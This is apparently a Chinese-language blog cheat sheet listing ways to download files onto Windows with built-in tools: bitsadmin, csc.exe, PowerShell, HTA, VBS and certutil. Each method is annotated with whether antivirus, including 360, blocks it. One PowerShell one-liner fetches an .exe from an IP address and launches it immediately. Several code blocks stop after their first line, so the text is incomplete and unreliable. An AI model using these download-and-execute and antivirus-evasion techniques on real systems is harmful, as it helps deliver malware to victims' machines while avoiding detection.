bitsadmin下载文件
bitsadmin是一个控制台工具,可用于创建下载或上传工作和监测其进展情况。xp以后的Windows系统自带,需要使用超级管理员用户运行,会被杀软检测查杀。
1 | bitsadmin /transfer job_name /download /priority priority URL local\path\file |
利用CSC(windows的c#编译器)来下载文件
利用win自带程序csc.exe,对cs脚本进行编译为download.exe程序,执行该程序可进行下载
1 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:c:\test\download.exe download.cs |
download.cs
1 | using System.Net; |
利用powershell下载文件
powershell直接运行,一般会被杀软拦截
1 | powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:\test\1.exe');start-process 'C:\test\1.exe' |
利用hta下载文件
保存后缀为.hta文件运行,360杀软未拦截
1 | <html> |
利用vbs下载文件
保存后缀为.vbs文件运行,360杀软未拦截
1 | Set Post = CreateObject("Msxml2.XMLHTTP") |
利用certutil下载文件
直接cmd执行
1 | 指定文件名保存: |